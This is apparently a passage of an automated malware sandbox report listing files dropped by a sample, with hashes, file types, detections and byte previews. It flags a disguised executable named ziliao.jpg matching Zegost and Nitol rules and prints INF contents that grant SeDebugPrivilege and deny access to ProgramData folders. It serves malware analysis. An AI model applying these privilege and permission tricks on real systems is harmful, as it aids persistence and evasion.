SHA1:	4D05F5D4BF3D3A9EB5D8260B81881A930E4C7BC8
SHA-256:	A56DF0595FBCA088DE86C4EFB5CC37DFE4B014B2CB2A80FB5B1800BC42AEC845
SHA-512:	1860CDCA73E80F973E8E8D99378982D4FFEB43F86FB9E1F91462F829C4589A5C2331E95389484E3FB41C230DA466239AB581B3A383AC4B4399DFE70190F50618
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xe0ebbf00, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6291387408576385
Encrypted:	false
SSDEEP:	1536:HSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Haza9iJa+2UtmOQOL
MD5:	30F988807F9AF3AAF1BC318BAE0C50E5
SHA1:	4B21BB0A1D3C79883D4BF2F5A3C6D7FC4E244402
SHA-256:	4D781FE7084B9E741CFDF325C8CF305DCF7D0F87C427988F326A4C1905C31EDA
SHA-512:	6A3925B07F4556C8EE4B2C66FF7F51E2F0D39EA71C57671EE590E1C9008DBF792FDBADC652F9D8670BB65EE5A9DD58C2BFC5E249C3412D40BA44CBD1701CF307
Malicious:	false
Preview:	...... .......P.......X\...;...{......................0.j.....4....\|}.%....\|..h.g.....4....\|}.0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................!..4....\|}..................#g~4....\|}..........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08003150166533214
Encrypted:	false
SSDEEP:	3:UnWlWetYe3y+Ppc/lyCocCeelXH8z/lillHol///lZMPCyH:+iTz3yGm8srIpo5
MD5:	174F831E80C2F957F961AD5BA2237FD9
SHA1:	53767553CB29C5ED796804A2481322CA586EE831
SHA-256:	71BAF67F2B8C4F988D02194E0FABF3F04A0B7279F6DCBFAF1169512A1EEC88A1
SHA-512:	09DA45B7F169F5F43CAAA0E5C7A0F5C5A9631770537B94F1074C235E73DCC1977189B79A01224745F63574BDE77600C0BB5F62C53A78BF341EC3898F7251C2FA
Malicious:	false
Preview:	/p......................................;...{..%....\|..4....\|}.........4....\|..4....\|}. .ww4....\|]..................#g~4....\|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Program\ziliao.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	226751
Entropy (8bit):	6.266031345877556
Encrypted:	false
SSDEEP:	6144:x/x6F5WCmLGEOmC4v8Z0J+c4v8Z0J+iI8:x/xSWYEOL
MD5:	497BC4B17398D5AFC4622E66E623F533
SHA1:	68699B0FD00BF5E5A71CBB9CE6AFB158D6A492CD
SHA-256:	543C66B627F6B6380B0E6A4ACD1FDD523051FEE344DC059DED299F1CC2135B54
SHA-512:	2CE9930DBF17BE7DB460A145F13C82B9C5A40595FAFF95830880949492B22CB3010379DEF6A3AD3435DC712003004766BBEEB27FC383DD784CA5723C3151961C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
Preview:	....U....SV.q<W.U.D.x..tm.\|.\|.tf.\...]...t[.T...t. ..D.$..U...3.u..E..t:.<.3....}.....t...i..........C....u.].......;u.t..u.B;.r.3._^[..].}..u..E....P.U.......WQ.U...U..Q.e.......X-.....E..E...].U..QQd.0...SVW.@...P..A..r$3.z(...~.........ar......i.........Nu.....................u.3.j..T..........P.x. ..........3.b4.^.C........3.s.H..C........3...\p.C...........C..E..E.ntdlf.E.l.P.S..3...y....._....3......C....N...YY_^.C.[..].r..a...U......M..E.SV..u.3......MZ..f9.u.W.x<...?PE....s....L...f9G...d......f9G...W...j@h.....wP3.S.Q.......=....wT.E..u.V.P..~<3....]..}.f;G.sX.]......E..H...t+..8.t..0.@...P.E.Q.P.....8.v..w8.E.Q.P..E..M...(.E.A..G.;.M..E.\|.3........t`9.....tX..0.E.B..]...E...~1..TY....E..0..%....f;E.u...........+G4..2C;].\|.3.E....A....E.....u.........t.9.....tw...i..P.E..P..E...."....E.....u..H..P...M...U....t3.]...y.......F...P.u.........E.....E.....u.}.3.E.....E..@...u.........t?.L1.3.j.X+..M......]..E.E..t...Sj.V...M..E...@.M..E.;.u

C:\ProgramData\Program\iusb3mon.exe

Download File

Process:	C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2633392
Entropy (8bit):	7.936495936585084
Encrypted:	false
SSDEEP:	49152:tlQyIq2L9C9q4ypWczgVkJTVhtF2sVa2FFPVTwwUMGSG6t/yR:tlQyIIq3Wc0VEhDoYFPVbV
MD5:	22AF53F40D27C913642C0572C73A5D87
SHA1:	A4A2C066F6C9949581077CF561603EFB613C49CE
SHA-256:	1EFD96D0CA1622C7B69423B383D24699C60007FA671B7B40D7A944160E09558C
SHA-512:	E8D3523BFDB33D9121EF6AD8EA45541687B7B903A7F4D64B1F553DABF676C60385662FA529844A5DA118040E5DC8ABDA853928B18F9B777D5B1EEDD550D27769
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$..... ......X.>...........@..........................0d......f(...@.................................. .......0...\|............(............................................................................................. L........................... ..` .........b..................@..@ h............j..............@... ]............n..............@..@ ,............H..............@..B.idata....... .......`..............@....rsrc....~...0...~...b..............@..@.winlice.@8.........................`....boot....4%...>..4%.................`..`........................................................................................................................

C:\ProgramData\mntemp

Download File

Process:	C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:rY3BzHyX2n:OFSmn
MD5:	1FE6AD93F481ED3B179D8151C27D40A6
SHA1:	5E339C4663C6F6C7F8F9975D50CAFE0E773DFFCA
SHA-256:	5D69202894C8F7C6183BCB8329CBBF9DABB56EE815B3240678F3F1070CFDBD4E
SHA-512:	97C349EAFA519C2FA86C89E741F5FBCEE9BEC03E4ABF9CEE4CB15170D70C9041F14FF2CEFD82D817DFAE82426526E17E2F8D13D4F50A7B98287C9ABFCE444178
Malicious:	false
Reputation:	unknown
Preview:	..:.....HV.9f..

C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2633392
Entropy (8bit):	7.936495936585084
Encrypted:	false
SSDEEP:	49152:tlQyIq2L9C9q4ypWczgVkJTVhtF2sVa2FFPVTwwUMGSG6t/yR:tlQyIIq3Wc0VEhDoYFPVbV
MD5:	22AF53F40D27C913642C0572C73A5D87
SHA1:	A4A2C066F6C9949581077CF561603EFB613C49CE
SHA-256:	1EFD96D0CA1622C7B69423B383D24699C60007FA671B7B40D7A944160E09558C
SHA-512:	E8D3523BFDB33D9121EF6AD8EA45541687B7B903A7F4D64B1F553DABF676C60385662FA529844A5DA118040E5DC8ABDA853928B18F9B777D5B1EEDD550D27769
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$..... ......X.>...........@..........................0d......f(...@.................................. .......0...\|............(............................................................................................. L........................... ..` .........b..................@..@ h............j..............@... ]............n..............@..@ ,............H..............@..B.idata....... .......`..............@....rsrc....~...0...~...b..............@..@.winlice.@8.........................`....boot....4%...>..4%.................`..`........................................................................................................................

C:\Users\user\AppData\Local\.dat

Download File

Process:	C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	77
Entropy (8bit):	4.535706673281305
Encrypted:	false
SSDEEP:	3:rmgQABQtuUXyl/W/Kr/2NrNrNj:xQAWtz0Wir+BBh
MD5:	3640EEA31796D99A3D867CEAB75D7578
SHA1:	4B521C2F8659DDC09DA60CB5FA3D1756F485DECC
SHA-256:	F432F69930C602F5D0012419B108C55C59CFF3ACA5DAAF0A34B793B0310D4599
SHA-512:	576D14FCDFA6DE851B65CE8CD81426E2DD44E5E1581C3C7B6F6F9C0C9F88123B8084B9EA707CA4B9C63B1C9F1130D881808527D33E4681E109774D0155BB087A
Malicious:	false
Reputation:	unknown
Preview:	......[....:]Run..[...:]2024-12-28 22:24:54..[....:][WIN]r[WIN]r[WIN]r[WIN]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	390
Entropy (8bit):	3.70121954190789
Encrypted:	false
SSDEEP:	12:Q+eSREiRFGjowZaDaK2YhvfqlbTb47ZkW:Q+eSREMAF42SiJP4lB
MD5:	B66F55531E3BC2059BC9DC2925BD022D
SHA1:	D2F77035A6CFFF4F3FCE7F08902B790623C5C48A
SHA-256:	1A19404888C3463A206AE85DA582A233E4FF74E5AFEA7FCE71D24E3F71F88B8C
SHA-512:	8FE726CACE14EEFEDEBA9E9367F9D415B631525BF4EC1DD43C0A91890EF92382C1D24631165566114468BF0C38999569C7D5BAA3089BE1606DC243D2116FC129
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.r.o.g.r.a.m.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	384
Entropy (8bit):	3.6991205247583334
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvfgDJrlbhEZUEn4lywCfHhkW:Q+eSREiRFGjowZaDaK2YhvfqlbEd7ZkW
MD5:	FA353436F217DA03FE4519A7E87768CC
SHA1:	766A1F589BABFD00B0CC0FEEDDB22E7DB408E975
SHA-256:	A0814A0E57FD427C73E0938D4B507EA43CDF1A720D27D36E5C7530099082E1CC
SHA-512:	43C3A23178A71B714FB9AEF57F8CB413C13E001DD28BD3DC0F23272F7FECEBB83E24892F0CF59331C1D6B111DCE7A91965793D2BE435939FAD72B184AFFB074F
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.D.a.t.a.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	242
Entropy (8bit):	3.536378176812677
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvn:Q+eSREiRFGjowZaDaK2Yhvn
MD5:	1F3CD3C20662B3BB095A373DBD1DEC58
SHA1:	D5AA739E0BF5D0B103713AF5BBA01359530AABDF
SHA-256:	7EA20DD93DBB33C14C7D9772B39828B3360FBE080DF2B5AAD14BA3D838E18DA5
SHA-512:	08C554EE7F897B070DF94E6F3B5B366AE69B12D16F90D34B4CD4D9C95037D6178447B39E732FCCF898F6C768318AB117B03DB2363CD55CFACD7F53530D86FE0C
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bb1fvvi.30h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0diums24.4l1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14goiez0.nfe.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fgblp4m.hty.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22nak43q.0np.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23a3d3g5.sir.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23qsrtsx.pvn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lnycfqt.uwb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dvfzhfq.2rg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3eaahh5r.nq3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ehleht5.jne.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3it0frrs.ctp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vmel5rj.k5j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xrdh1pe.tqm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
